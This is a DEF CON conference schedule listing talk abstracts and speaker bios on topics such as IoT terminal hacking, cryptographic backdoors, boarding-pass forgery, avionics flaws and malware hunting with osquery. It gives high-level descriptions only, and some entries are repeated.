This topic is the unique opportunity to hear about real cases of public device hacking and see the process of compromising the different terminals from the beginning to the end:
Parking and ticket terminals
Information terminals in museums/cinemas/whatever else
Hotels infrastructures
Airport infrastructure
Road Cameras/speed radars
Topic includes:
Methodology for security analysis of public IoT
Post-exploitation scenarios
Methodology for improving the security of these devices
Non-trivial protection for non-trivial device
Exclusive research of non-trivial IoThings, a lot of proofs with video-demonstration. "Watch Dogs" in real life.
Denis Makrushin is an expert of the Global Research and Analysis Team at Kaspersky Lab. He graduated from the Information Security Faculty of National Research Nuclear University. Specializes in analysis of possible threats and follows the Offensive Security philosophy. At this time, he continues his researches Targetted Attack detection based on Game Theory methods in graduate school of MEPhI.
Social media links if provided.
Vladimir Daschenko
@difezza
Return to Index
CPV - Bronze 1 - Friday - 19:00-20:00
Talk Title:
How to backdoor Diffie-Hellman
Speaker Name, Employer or position:
David Wong - Security Consultant at NCC Group
Abstract:
Lately, several backdoors in cryptographic constructions, protocols and implementations have been surfacing in the wild: Dual-EC in RSA's B-Safe product, a modified Dual-EC in Juniper's operating system ScreenOS and a non-prime modulus in the open-source tool socat. Many papers have already discussed the fragility of cryptographic constructions not using nothing-up-my-sleeve numbers, as well as how such numbers can be safely picked. However, the question of how to introduce a backdoor in an already secure, safe and easy to audit implementation has so far rarely been researched (in the public).
Bio:
David Wong is a Security Consultant at the Cryptography Services team of NCC Group. He has been working in Security for over a year now, being part of several publicly funded open source audits such as the OpenSSL and the Let's Encrypt ones. He has conducted research in many domains in cryptography, publishing whitepapers as well as writing numerous editions of the Cryptography Services private bulletin. He has been a trainer for cryptography courses at BlackHat US 2015 and BlackHat US 2016.
Social media links if provided:
@lyon01_david
Return to Index
DEFCON - Track One - Friday - 14:00-14:59
How to Design Distributed Systems Resilient Despite Malicious Participants
Radia Perlman EMC Fellow
Often distributed systems are considered robust if one of the components halts. But a failure mode that is often neglected is when a component continues to operate, but incorrectly. This can happen due to malicious intentional compromise, or simple hardware faults, misconfiguration, or bugs. Unfortunately, there is no single add-on to designs that will fix this case. This talk presents three very different systems and how they each handle resilience despite malicious participants. The problems, and the solutions, are very different. The important message of this talk is that there is no one solution, and that this case must be considered in designs.
Radia Perlman is a Fellow at EMC. She has made many contributions to the fields of network routing and security protocols including robust and scalable network routing, spanning tree bridging, storage systems with assured delete, and distributed computation resilient to malicious participants. She wrote the textbook Interconnections , and cowrote the textbook Network Security. She holds over 100 issued patents. She has received numerous awards including lifetime achievement awards from ACM's SIGCOMM and Usenix, election to National Academy of Engineering, induction into the Internet Hall of Fame, and induction into the Inventor Hall of Fame. She has a PhD from MIT.
Return to Index
DEFCON - Track One - Sunday - 10:00-10:59
How to Do it Wrong: Smartphone Antivirus and Security Applications Under Fire
Stephan Huber Fraunhofer SIT
Siegfried Rasthofer Fraunhofer SIT & TU Darmstadt
-Today’s evil often comes in the form of ransomware, keyloggers, or spyware, against which AntiVirus applications are usually an end user’s only means of protection. But current security apps not only scan for malware, they also aid end users by detecting malicious URLs, scams or phishing attacks.
Generally, security apps appear so self-evidently useful that institutions such as online-banking providers even require users to install anti-virus programs. In this talk, however, we show that the installation of security applications, at least in the context of smartphones, can sometimes open the phone to a number of attack vectors, making the system more instead of less vulnerable to attacks.
In a recent research we conducted on Android security apps from renowned vendors such as Kaspersky, McAfee, Androhelm, Eset, Malwarebytes or Avira. When conducting a study of the apps’ security features (Antivirus and Privacy Protection, Device Protection, Secure Web Browsing, etc.) it came as a shock to us that every inspected application contained critical vulnerabilities, and that in the end no single of the promoted security features proved to be sufficiently secure. In a simple case, we would have been able to harm the app vendor’s business model by upgrading a trial version into a premium one at no charge.
In other instances, attackers would be able to harm the end user by completely disabling the malware-scanning engine remotely. Or how about accessing confidential data by exploiting broken SSL communication, broken self-developed "advanced" crypto implementations or through SQL-injections?
Yes, we can. On top, we were able to bypass the secure browsing protection and abuse it for code execution. The most alarming findings, however, were security applications that we were able to actually turn into a remote access trojan (RAT) or into ransomware. In light of all those findings, one must seriously question whether the advice to install a security app onto one’s smartphone is a wise one. In this talk, we will not only explain our findings in detail but also propose possible security fixes.
Stephan Huber is a security researcher at the testlab mobile security group at the Fraunhofer Institute for Secure Information Technology (SIT). His main focus is Android application security testing and developing new static and dynamic analysis techniques for app security evaluation. He found different vulnerabilities in well-known Android applications and the AOSP. In his spare time he enjoys teaching students in Android hacking.
Siegfried Rasthofer is a fourth year PhD student at the TU Darmstadt (Germany) and Fraunhofer SIT and his main research focus is on applied software security on Android applications. He developed different tools that combine static and dynamic code analysis for security purposes. He likes to break Android applications and found various AOSP exploits. Most of his research is published at top tier academic conferences and very recently he started publishing at industry conferences like BlackHat, VirusBulletin or AVAR.
Return to Index
WOS - Skyview 6 - Saturday - 11:10-11:59
How to Find 1,352 WordPress XSS Plugin Vulnerabilities in 1 Hour (not really)
Larry W. Cashdollar, Senior Security Intelligence Response Team Engineer at Akamai Technologies.
I'll discuss my methodology in attempting to download all 50,000 WordPress plugins, automated vulnerability discovery, automated proof of concept creation and automated proof of concept verification. I'll go into where I went wrong, what I'd change and where I succeeded.
Larry W. Cashdollar (Twitter: @_larry0) has been working in the security field and finding vulnerabilities for over 15 years. With over 100 CVEs to his name, he is a known researcher in the field. You can see many of the disclosed vulnerabilities at vapidlabs.com. He is a member of the SIRT at Akamai Technologies.
Return to Index
DEFCON - DEF CON 101 - Sunday - 10:00-10:59
How to get good seats in the security theater? Hacking boarding passes for fun and profit.
Przemek Jaroszewski CERT Polska/NASK
While traveling through airports, we usually don't give a second thought about why our boarding passes are scanned at various places. After all, it's all for the sake of passengers' security. Or is it? The fact that boarding pass security is broken has been proven many times by researchers who easily crafted their passes, effectively bypassing not just ‘passenger only’ screening, but also no-fly lists. Since then, not only security problems have not been solved, but boarding passes have become almost entirely bar-coded. And they are increasingly often checked by machines rather than humans. Effectively, we're dealing with simple unencrypted strings of characters containing all the information needed to decide on our eligibility for fast lane access, duty-free shopping, and more...
With a set of easily available tools, boarding pass hacking is easier than ever, and the checks are mostly a security theater. In my talk, I will discuss in depth how the boarding pass information is created, encoded and validated. I will demonstrate how easy it is to craft own boarding pass that works perfectly at most checkpoints (and explain why it doesn't work at other ones).
I will also discuss IATA recommendations, security measures implemented in boarding passes (such as digital signatures) and their (in)effectiveness, as well as responses I got from different institutions involved in handling boarding passes. There will be some fun, as well as some serious questions that I don't necessarily have good answers to.
Przemek Jaroszewski is a member of CERT Polska (part of Research and Academic Computer Network in Poland) since 2001, where his current position is the head of incident response. He started his education as a programmer at Warsaw University of Technology, to eventually get his master's degree in Social Psychology from University of Social Sciences and Humanities in Warsaw. A frequent flyer in both professional and private lives, and a big aviation enthusiast - using every opportunity to learn about everything from inner workings of airports, airlines, ATC etc. to life-hacking of loyalty programs.
Return to Index
DEFCON - Track Three - Friday - 13:00-13:59
How to Make Your Own DEF CON Black Badge
Mickey Shkatov (@Laplinker) Intel Advanced Threat Research
Michael Leibowitz (@r00tkillah) Senior Trouble Maker
Joe FitzPatrick (@securelyfitz) Instructor & Researcher, SecuringHardware.com
Dean Pierce (@deanpierce) Security Researcher, Intel
Jesse Michael (@jessemichael) Security Researcher, Intel
Kenny McElroy (@octosavvi) Hacker
Yes, we did, we made our own DEF CON black badges. Why? Because we didn't want to wait in line ever again-- Not really. We are a bunch of hackers that always look for a challenge, and what better challenge is there than to try and reverse engineer from scratch three DEF CON black badges? In this talk we will go through the 2 year long process of making the DC14, DC22 and DC23 Black badges which include amazing hacking techniques like social engineering, patience, reverse engineering, EAGLE trickery, head to desk banging and hoping it is passable to a goon and not shameful to DT, 1057, and Joe.
Speaker Name Mickey (@laplinker) is a security researcher and a member of the Advanced Threat Research team. His areas of expertise include vulnerability research, hardware and firmware security, and embedded device security. Mickey has presented some of his past research at DEF CON , Black Hat, BruCON, Bsides PDX, PacSec, and HES.
Twitter: @laplinker
Michael has done hard-time in real-time. An old-school computer engineer by education, he spends his days championing product security for a large semiconductor company. Previously, he developed and tested embedded hardware and software, dicked around with strap-on boot roms, mobile apps, office suites, and written some secure software. On nights and weekends he hacks on electronics, writes DEF CON CFPs, and contributes to the NSA Playset.
Twitter: @rootkillah
Joe FitzPatrick is an Instructor and Researcher at https://SecuringHardware.com. Joe has spent over a decade working on low-level silicon debug, security validation, and hardware penetration testing, and hardware security training. In between training and bricking hardware, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects
Twitter: @sefcurelyfitz
Dean Pierce is a computer security researcher from Portland, Oregon. Dean has 15 years of experience in the field, with former DEF CON talks on breaking WiFi, WiMAX, and GSM networks. Author of many silly tools, creator of many silly websites. Security researcher by night, and security researcher that gets paid by day, Dean is currently doing tool development and attack modeling on Intel Corporation’s internal penetration testing team.
Twitter: @deanpierce
Jesse Michael spends his time annoying Mickey and finding low-level hardware security vulnerabilities in modern computing platforms.
Twitter: @jessemichael
Kenny McElroy is a Security Researcher, Lock picker, Tinkerer, Embedded hacker, Jam Skater, SMT solderer, SDR twiddler, Space Geek and Bluewire Artist.
Twitter: @octosavvi
Return to Index
DEFCON - Track One - Saturday - 10:00-10:59
How to Overthrow a Government
Chris Rock Founder and CEO, Kustodian
Direct from the mind of the guy who bought you the "I will kill you" presentation at DEF CON 23, is another mind bending, entertaining talk. This time it’s bigger and badder than before.
Are you sick and tired of your government? Can’t wait another 4 years for an election? Or do you want to be like the CIA and overthrow a government overseas for profit or fun? If you answered yes to one or more of these questions than this talk is for you! Why not create your own cyber mercenary unit and invoke a regime change to get the government you want installed? After all, if you want the job done right, sometimes you have to do it yourself.
Find out how over the last 60 years, governments and resource companies have been directly involved in architecting regime changes around world using clandestine mercenaries to ensure deniability. This has been achieved by destabilizing the ruling government, providing military equipment, assassinations, financing, training rebel groups and using government agencies like the CIA, Mossad and MI-5 or using foreign private mercenaries such as Executive Order and Sandline. Working with Simon Mann an elite ex SAS soldier turned coup architect who overthrew governments in Africa, Chris Rock will show you how mercenary coup tactics directly applied to digital mercenaries to cause regime changes as the next generation of "Cyber Dogs of War".
Chris will walk you through a cyber regime change from start to finish on a real country and show you how to architect a coup achieving the same result as a traditional mercenary operation without any blood spilt. This will include taking ownership of all facets of government including finance, telecommunications, transportation, commercial companies and critical infrastructure such a power, water and oil. You will learn:
• Traditional military mercenary coup tactics used by the infamous 32 Battalion in Africa, Executive Order and Sandline that can be directly applied to a cyber mercenary regime change.
• How to architect a cyber coup using advisor’s, hackers and the general populace, using misinformation, professional agitators, false information and financing.
• How to gather intelligence to analyze a government’s systemic weaknesses on financial, societal values and political climates that is leader or country specific to structure your attack.
• How to identify and prioritize government resources, infrastructure and commercial companies and how to use these compromised assets to stage the coup.
• Combine physical and digital techniques and have the best of both worlds to own a countries infrastructure.
• Hot to manipulate the media using propaganda targeting journalists flawed multiple "source" rules for a story.
• The Grand finale of a cyber regime change on a real country from beginning to end using the above techniques with operational footage. Come to this talk and find out how you too can be your own dictator, benevolent or merciless that part is up to you.
Chris Rock presented "I will kill you" at DEF CON 23 has been active in the security industry for the last 20 years and is the founder and CEO of Kustodian, a specialized security company that specializes in Security Operations Centres, Penetration testing and independent research. Kustodian is an Australian, Middle East and Hong Kong registered company that has been operational for over 10 years. Chris has also spent 12 years in the banking sector and provides security services around the world for small, medium and large companies. Chris Rock also created SIEMonster, an open source, scalable, free Security Incident and Event Management (SIEM) as a commercial alternative to Splunk, ArcSight and AlienVault. SIEMonster can be run on Amazon AWS or Virtual machines and details can be found on www.siemonster.com
Twitter: @_kustodian_
Facebook
Return to Index
DEFCON - Track One - Friday - 15:00-15:59
How to Remmote Control an Airliner: SecurityFLawsin Avionics
Sebastian Westerhold KF5OBS
This talk is exposing critical flaws in navigational aides, secondary surveillance radar, the Traffic Collision Avoidance System (TCAS) and other aviation related systems. The audience will gain insight into the inner workings of these systems and how these systems can be exploited. Several practical demonstrations on portable avionics will show just how easy it is to execute these exploits in real life.
Sebastian Westerhold, better known under his FCC assigned radio call-sign KF5OBS, is a well known electrical engineer with a general interest in security analysis and penetration testing. As a teenager, he has been writing articles for the leading German electronics Magazine FUNKAMATEUR and the leading European magazine Elektor. Today, his blog and YouTube channel attract electronics enthusiasts from all over the world.
Return to Index
SE - Palace 2-5 - Saturday - 19:00-19:55
Steven Zani
Dr. Steven J. Zani holds a PhD in Comparative Literature, an MA in Philosophy, and Bachelors degrees in English, Philosophy and French. He has taught at the university level for over twenty years and served multiple years as a department chair. Currently he works as the Faculty Development Director, overseeing over 500 faculty and staff at Lamar University, in the Texas State University System, in Beaumont, TX.
Description: What can defunct C.I.A. Manuals, radical lesbian separatists, and an 18th century Romantic essayist teach you about engineering the world to be a better place? We often think about social engineering either on the small-scale – how can one operate in individual conversations to manipulate others for data, access, or specific, immediate purposes – or we think about engineering on a large scale, how politicians or other popular figures embrace and direct a culture. But what about the mid-range? This non-technical paper briefly addresses the techniques and histories of large and small-scale social engineering in order to address the middle ground. This presentation by someone with years of experience with staff and faculty at a state institution will discuss social-engineering on the job, on committees, and dealing with small, educated and uneducated collectives.
Return to Index
BHV - Skyview 4 - Sunday - 12:00-12:59
Speaker: Jay Radcliffe
About Jay:
Jay Radcliffe has been working in the computer security field for over 20 years. Coming from the managed security services industry, Jay has used just about every security device made over the last decade. Recently, Jay presented ground-breaking research on security vulnerabilities in medical devices, and was featured on national television as an expert on medical device vulnerability. Jay also has experience with hardware hacking and radio technology. Jay holds a Master's degree in Information Security Engineering from SANS Technology Institute, as well as a Bachelor's degree in Criminal Justice/Pre-Law from Wayne State University. SC Magazine named him one of the Top Influential IT Security Thinkers in 2013.
One of the huge criticisms of Security research is the lack of process and adherence to traditional research methods. Quite often our "research" is just tearing apart systems and exposing their vulnerabilities. While this is useful, there is a better way. This talk will walk through the process of how I used the scientific method to conduct the research that led to my 2011 insulin pump findings. By changing just a couple steps in our research, I think that we can bring more outside credibility to our hard, and important work.
Return to Index
BHV - Skyview 4 - Sunday - 12:00-12:59
Speaker: Jay Radcliffe
About Jay:
Jay Radcliffe has been working in the computer security field for over 20 years. Coming from the managed security services industry, Jay has used just about every security device made over the last decade. Recently, Jay presented ground-breaking research on security vulnerabilities in medical devices, and was featured on national television as an expert on medical device vulnerability. Jay also has experience with hardware hacking and radio technology. Jay holds a Master's degree in Information Security Engineering from SANS Technology Institute, as well as a Bachelor's degree in Criminal Justice/Pre-Law from Wayne State University. SC Magazine named him one of the Top Influential IT Security Thinkers in 2013.
One of the huge criticisms of Security research is the lack of process and adherence to traditional research methods. Quite often our "research" is just tearing apart systems and exposing their vulnerabilities. While this is useful, there is a better way. This talk will walk through the process of how I used the scientific method to conduct the research that led to my 2011 insulin pump findings. By changing just a couple steps in our research, I think that we can bring more outside credibility to our hard, and important work.
Return to Index
BHV - Skyview 4 - Sunday - 13:00-13:59
Speaker: dlaw and razzies
About Jennifer Szkatulski:
Jennifer has been an information security professional for the past 20 years and is currently a Security Intelligence Analyst. Her experience includes reverse engineering malware, penetration testing, vulnerability analysis, and incident response. Jennifer studied biology and psychology and focused her studies on neurology. Her passion for brain science, coupled with computer science, has been a driving factor in her interest in the technological singularity and human/machine integration. In her free time she runs a robotics club for kids and is learning to play the ukulele. She is an avid fan of the Detroit Tigers, William Shakespeare, and the oxford comma.
About Darren Lawless:
Darren Lawless is a security analyst with 14+ years of plugging dykes and playing sentry. He currently leads the threat monitoring team for a large security services organization. His interest in all things *bio* has blossomed and intensified over the last couple years resulting in forays, experimentation, and investigation into nootropics, biofeedback, and augmentation, implantation, brain stimulation, and a sundry wet-tech bad-assedness.
“Genomics saved my life.” – Jen
“My father can rot in hell.” - Darren
How is personalized medicine important? Should I get a genomic test? Is the Illuminati collecting my data? What can I learn from genetic testing? What are the risks? How do I choose a test? Will my doctor hate me if I get a genetic test?
These questions won’t be answered in thirty minutes, but we offer grist for the discussion mill.
We will present two personal stories on how genomics can have a real effect on your medical treatment, your understanding of who you are, and how you live your life.
Return to Index
BHV - Skyview 4 - Sunday - 13:00-13:59
Speaker: dlaw and razzies
About Jennifer Szkatulski:
Jennifer has been an information security professional for the past 20 years and is currently a Security Intelligence Analyst. Her experience includes reverse engineering malware, penetration testing, vulnerability analysis, and incident response. Jennifer studied biology and psychology and focused her studies on neurology. Her passion for brain science, coupled with computer science, has been a driving factor in her interest in the technological singularity and human/machine integration. In her free time she runs a robotics club for kids and is learning to play the ukulele. She is an avid fan of the Detroit Tigers, William Shakespeare, and the oxford comma.
About Darren Lawless:
Darren Lawless is a security analyst with 14+ years of plugging dykes and playing sentry. He currently leads the threat monitoring team for a large security services organization. His interest in all things *bio* has blossomed and intensified over the last couple years resulting in forays, experimentation, and investigation into nootropics, biofeedback, and augmentation, implantation, brain stimulation, and a sundry wet-tech bad-assedness.
“Genomics saved my life.” – Jen
“My father can rot in hell.” - Darren
How is personalized medicine important? Should I get a genomic test? Is the Illuminati collecting my data? What can I learn from genetic testing? What are the risks? How do I choose a test? Will my doctor hate me if I get a genetic test?
These questions won’t be answered in thirty minutes, but we offer grist for the discussion mill.
We will present two personal stories on how genomics can have a real effect on your medical treatment, your understanding of who you are, and how you live your life.
Return to Index
WOS - Skyview 6 - Saturday - 12:10-12:59
HTTP/2 & QUIC - Teaching Good Protocols To Do Bad Things
Catherine (Kate) Pearce, Senior Security Consultant at Cisco Security Services
Vyrus, Senior Security Consultant at Cisco Security Services
The meteoric rise of SPDY, HTTP/2, and QUIC has gone largely unremarked upon by most of the security field. QUIC is an application-layer UDP-based protocol that multiplexes connections between endpoints at the application level, rather than the kernel level. HTTP/2 (H2) is a successor to SPDY, and multiplexes different HTTP streams within a single connection. More than 10% of the top 1 Million websites are already using some of these technologies, including much of the 10 highest traffic sites. Whether you multiplex out across connections with QUIC, or multiplex into fewer connections with HTTP/2, the world has changed. We have a strong sensation of Déjà vu with this work and our 2014 Black Hat USA MPTCP research. We find ourselves discussing a similar situation in new protocols with technology stacks evolving faster than ever before, and Network Security is largely unaware of the peril already upon it. This talk briefly introduces QUIC and HTTP/2, covers multiplexing attacks beyond MPTCP, discusses how you can use these techniques over QUIC and within HTTP/2, and discusses how to make sense of and defend against H2/QUIC traffic on your network. We will also demonstrate, and release, some tools with these techniques incorporated.
Catherine (Kate) Pearce (Twitter: @secvalve) is a Senior Security Consultant for Cisco, who is based in Wellington, New Zealand. Formerly a Security Consultant for Neohapsis in the USA, she has engaged with a widespread and varied range of clients to assist them in understanding their current security state, adding resilience into their systems and processes, and managing their ongoing security risk. Day-to-day she undertakes a mix of advising clients around their security, client-focused security assessments (such as penetration tests), and security research. She has spoken at her work at many security conferences, including Black Hat USA, Source Boston, Nolacon, Kiwicon, ACSC and several others. While she has recently presented on Network Security, her true loves are application security enablement, complex systems security, and cross-discipline security analogues.
Carl Vincent (Twitter: @vyrus001) is a Customer Solutions Consultant for the recently consolidated Cisco Security Solutions group, where he performs a variety of security assessment types. As an information security professional, as well as personal hobbyist, his passion is to continually research ever increasingly elaborate methods of elegantly executed hypothetical crime. He also practices personal information warfare, and most of his biographic details online are somewhat exaggerated.
Return to Index
SE - Palace 2-5 - Saturday - 16:00-16:55
Cyni Winegard & Bethany Ward
“Cyni: Cyni Winegard is currently an information security analyst with TraceSecurity. Starting her career as a systems administrator at a financial institution, she has moved into the information security industry and fallen in love with pen testing and social engineering. Cyni has a Bachelor of Science degree in history with a minor in anthropology from Florida A&M University and is currently working on a Masters in Cyber Security, as well as a Graduate Certificate in Terrorism and Homeland Security. She enjoys applying anthropological concepts to social engineering projects, and is passionate about compromising users. If not lost in cyberspace, Cyni can most likely be found practicing krav maga or seeking her soulmate (in the form of pizza).
Bethany: Bethany Ward fell in love with information security and digital forensics while pursuing a Bachelor of Science in Computer Science from the University of Arkansas. After graduation, she began her career in network security by joining TraceSecurity as an Information Security Analyst. In this position, she currently performs security assessments, pen-testing, social engineering, and audits for financial institutions. When not having way too much fun developing her pen-testing skills, Bethany enjoys volunteering with STEM-Up and geeking out over superheroes.”
Return to Index
BHV - Skyview 4 - Friday - 17:30-17:59
Speakers: Charles Tritt
About Charles:
Dr. Charles Tritt is a has been a professor of biomedical engineering for over 25 years. His academic credentials include a Ph.D. in chemical engineering and an M.S. in biomedical engineering. His teaching has ranged from introductory cell biology and genetics to biomedical mechatronics. Over the past several years, he has become interested in exploring the potential of hobbyist grade equipment as a vehicle to low cost and accessible medical devices and the corresponding ethical and legal implications.
Abstract:
In this demonstration, readily available and inexpensive (about $100 total cost) equipment will be used to relay conscious motor activity from one human subject to another. Specifically, transcutaneous electrodes and a bio-amplifier will be used to produce an electromyogram (EMG) signal from the lower arm of the controlling subject. This signal will be digitized and processed using an embedded microcontroller evaluation board (an Arduino UNO could also be used) which in turn will activate a relay to apply transcutaneous electrical nerve stimulation to the ulnar nerve of the controlled subject. Motions of the controlled subject’s fingers will involuntarily replicate those of the controlling subject.
Return to Index
BHV - Skyview 4 - Friday - 17:30-17:59
Speakers: Charles Tritt
About Charles:
Dr. Charles Tritt is a has been a professor of biomedical engineering for over 25 years. His academic credentials include a Ph.D. in chemical engineering and an M.S. in biomedical engineering. His teaching has ranged from introductory cell biology and genetics to biomedical mechatronics. Over the past several years, he has become interested in exploring the potential of hobbyist grade equipment as a vehicle to low cost and accessible medical devices and the corresponding ethical and legal implications.
Abstract:
In this demonstration, readily available and inexpensive (about $100 total cost) equipment will be used to relay conscious motor activity from one human subject to another. Specifically, transcutaneous electrodes and a bio-amplifier will be used to produce an electromyogram (EMG) signal from the lower arm of the controlling subject. This signal will be digitized and processed using an embedded microcontroller evaluation board (an Arduino UNO could also be used) which in turn will activate a relay to apply transcutaneous electrical nerve stimulation to the ulnar nerve of the controlled subject. Motions of the controlled subject’s fingers will involuntarily replicate those of the controlling subject.
Return to Index
Workshops - Las Vegas Ballroom 3 - Thursday - 15:00-19:00
Hunting Malware at Scale with osquery
Sereyvathana Ty Security Engineer, Facebook
Nick Anderson Security Engineer, Facebook
Javier Marcos de Prado Security Engineer, Uber
Teddy Reed Security Engineer, Facebook
Matt Moran Security Engineer Facebook
This workshop is an introduction to osquery, an open source SQL-powered operating system for instrumentation and analytics. osquery is developed and used by Facebook to proactively hunt for abnormalities. Since osquery allows us to easily ask questions about our infrastructure, it provides powerful capabilities, such as finding malware persistence techniques and scanning IOCs across our fleets of machines. This workshop is a very hands-on training and we expect participants to be comfortable with CLI. The workshop is broken into three components:
Part I - hunting malware with osquery (1.5 hours) The first section of the workshop will make use of the interactive osquery command line tool (osqueryi) to hunt for characteristics of malware residing on a local system. The goal of this section is to get students familiar with writing SQL statements and to understand how osquery makes use of core tables to abstract operating system artifacts.
Part II - osquery at scale (1.5 hours): The second part of the workshop will focus on automation and deployment of osquery at a larger scale. You will learn how to write “query packs” which are utilized to collect and analyze the results from various endpoints in an enterprise. We will demonstrate this concept with the use of virtual machines, however the methodologies can be extrapolated to larger enterprises.
Part III - osquery development (optional - 0.5 to 1 hours): The last part of the workshop focuses on osquery development. We will walk you through some of the core components of osquery so you can have a deeper understand of this application. The goal being to give the student sufficient information to hack on the osquery project. This segment is largely optional and designed for people who want to get familiar with how osquery works under the hood.
Who should attend?
This workshop is designed for information security professionals who defend small to large scale enterprise networks.
What you need to know?
- Linux/MAC operating systems and CLI environments
- Comfortable writing and operating in SQLite
- Knowledge of ELK stack or splunk deployment/functionality is helpful
- Some programming experience is helpful
What do you need to bring?
- General knowledge of malware TTP is helpful
- A laptop capable of running two virtual machines (2 cores +, 8GB RAM, and 40GB Free disk space)
- Pre-installed VMWare client
Sereyvathana Ty is a member of Detection Infrastructure at Facebook working on network security monitoring instrumentations. Before joining Facebook, he was a malware researcher for Palo Alto Networks where he was researching new techniques for detecting malware and developing mitigation strategies for WildFire, a malware analysis platform. He enjoys malware analysis, and he has a strong passion for developing security applications using machine learning techniques.
Javier Marcos Javier Marcos is a Security Engineer at Uber with experience working on both offensive and defensive teams. He is currently a member of Uber's Platform Security team and he created the Facebook CTF platform.
Nick Anderson is a Security Engineer at Facebook working in the Detection Infrastructure team on the osquery project. He came to Facebook after working at Sandia National Labratories as a Cybersecurity Engineer and enjoys malware analysis and reverse engineering in his free time.
Teddy Reed is a Security Engineer at Facebook developing production security tools. He is very passionate about trustworthy, safe, and secure code development. He loves open source and collaborative engineering when scale, resiliency, and performance enable defensive and protective software design. Teddy has published at security conferences on trusted computing, hardware trusted systems, UAVs, competition game theory, and other security-related research.
Matt Moran is a security engineer at Facebook working on building and improving network security monitoring tools. In the past, Matt worked as a system administrator deploying and maintaining scalable services for both Facebook and Yahoo. Matt has a bachelor’s degree in Information Technology from Mount Saint Mary college in New York.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: A laptop capable of running two virtual machines (2 cores +, 8GB RAM, and 40GB Free disk space). Pre-installed VMWare client.
Return to Index
Wireless - Skyview 1 - Friday - 18:00-18:50
Kat Sweet
Bio
Kat Sweet wrote her first line of code in her mid-twenties and never looked back. Now she's a network security student at Madison Area Technical College, where she also serves as president of her school's IT student organization. Outside of class, you can find her fixing other people's computers, teaching, and wielding pointy objects (mainly lockpicks and knitting needles). She has a ham radio Extra class license, and organizes ham exams for CircleCityCon. Combining her passions for infosec and terrible puns, she interns as a SOC monkey.
@TheSweetKat
I Amateur Radio (And So Can You!)
Abstract
Ham radio: its the 100 year-old technology that refuses to die. Whether youre a wireless enthusiast, electronics tinkerer, or just someone who wants to be able to communicate during the zombie apocalypse, having a ham radio license can open a new world of possibilities for any hacker. Come learn how and where to get your license, what you can expect to study, how you can work radio into your everyday hacking, and anything else you ever wanted to know about ham radio but were afraid to ask.
|
Return to Index
DEFCON - Track Two - Saturday - 10:00-10:59
I Fight For The Users, Episode I - Attacks Against Top Consumer Products
Zack Fasel Managing Partner, Urbane
Erin Jacobs Managing Partner, Urbane
This is not just another "I found a problem in a single IOT device" talk. Focusing on attacking three major consumer product lines that have grown rapidly in the past years, Zack and Erin will review flaws they’ve discovered and weaponized against home Windows installs, DIY security solutions, personal fitness tracking devices, and digital notification devices. We’ll review the security of these popular products and services in a ‘consumer reports’ style walkthrough, the attack methods against the 21 devices reviewed, release some tools for the lulz, and highlight the threats facing similar products. It's time to Fight for the Users. END OF LINE.
Zack Fasel and Erin Jacobs are Partners at Urbane Security, a solutions-focused vendor-neutral information security services firm focusing on providing innovative defense, sophisticated offense and refined compliance services.
Heading up Urbane's Research and Security Services divisions, Zack brings his years of diverse internal and external experience to drive Urbane's technical solutions to organizations top pain points. His previous research and presentations at conferences have spread across numerous domains including Windows authentication flaws, femtocells, open source defensive security solutions, cloud security, and unique network and application attack vectors. When not selling out, he can be found lost in the untz unce wubs, dabbling in instagram food photography, or eating scotch and drinking gummy bears (that's right, right?). More information on Zack can be found by searching for "zfasel" and on Urbane Security at UrbaneSecurity.com.
Leading the charge of Urbane’s Compliance and Enterprise Risk Management divisions, Erin brings her years of executive level experience coupled with deep and diverse technical knowledge to help organizations accurate prioritize and address the security and compliance risks they face. Her prior talks and research have spread across numerous domains, including technical solutions for compliance requirements, OSX reversing, diversity in tech, and IOT. More information on Erin can be found by following @SecBarbie on twitter.
Twitter: @UrbaneSec @zfasel @SecBarbie
Return to Index
DEFCON - Track Three - Saturday - 16:00-16:59
I've got 99 Problems, but Little Snitch ain't one
Patrick Wardle Director of Research, Synack
Security products should make our computers more secure, not less. Little Snitch is the de facto personal firewall for OS X that aims to secure a Mac by blocking unauthorized network traffic. Unfortunately bypassing this firewall's network monitoring mechanisms is trivial...and worse yet, the firewall's kernel core was found to contain an exploitable ring-0 heap-overflow. #fail Though briefly touching on generic firewall bypass techniques, this talk will largely focus on the kernel-mode vulnerability. Specifically, I’ll discuss bypassing OS X specific anti-debugging mechanisms employed by the product, reverse-engineering the firewall's I/O Kit kernel interfaces and 'authentication' mechanisms, and the discovery of the exploitable heap-overflow.
Finally, methods of exploitation will be briefly discussed, including how an Apple kernel-fix made this previously un-exploitable bug, exploitable on OS X 10.11
So if you simply want to see yet another 'security' product fall, or more generically, learn methods of OS X kernel extension reversing in a practical manner, then this talk is for you :)
Patrick Wardle is the Director of Research at Synack, where he leads cyber R&D efforts. Having worked at NASA, the NSA, and Vulnerability Research Labs (VRL), he is intimately familiar with aliens, spies, and talking nerdy. Currently, Patrick’s focus is on automated vulnerability discovery, and the emerging threats of OS X and mobile malware. In his personal time, Patrick collects OS X malware and writes free OS X security tools. Both can be found on his website; www.Objective-See.com
Twitter: @patrickwardle
Return to Index
Wireless - Skyview 1 - Saturday - 17:00-17:50
Darren Kitchen
Bio
Darren Kitchen is the founder of Hak5, the award winning Internet television show inspiring hackers and enthusiasts since 2005. Breaking out of the 90s phone phreak scene, he has continued contributing to the hacker community as a speaker, instructor, author and developer of leading penetration testing tools.
@hak5darren
Sebastian Kinne
Bio
Sebastian Kinne has led software development at Hak5 since 2011. His background in embedded systems and reverse engineering has been instrumental in the success of the WiFi Pineapple, the popular WiFi auditing tool. As an instructor and speaker on WiFi security, chances are he's sniffed your packets in a demo or two.
@sebkinne
Imagine a Beowulf cluster of Pineapples!
Abstract
In Soviet Russia, WiFi Pineapples YOU! It has been a big year for the project with the introduction of the 6th generation WiFi Pineapples -- the NANO and TETRA. Join Darren Kitchen and Sebastian Kinne of Hak5 as they unveil the latest from their secret hacker lair-bunker-stronghold. Come witness the release of code name "BUFFALO BULLDOZER" and harness the power of your WiFi Pineapple arsenal.
|
Return to Index
BHV - Skyview 4 - Friday - 13:30-13:59
Speaker: c00p3r
About c00p3r:
c00p3r is the founder of dangerousminds.io a biohacking. grinding, implantable tech, and network security podcast that started in late sept 2016 , a sysadmin that lives open source solutions by trade, and also pr director and member of the board of directors for prophase biostudios located in austin texas.
Abstract:
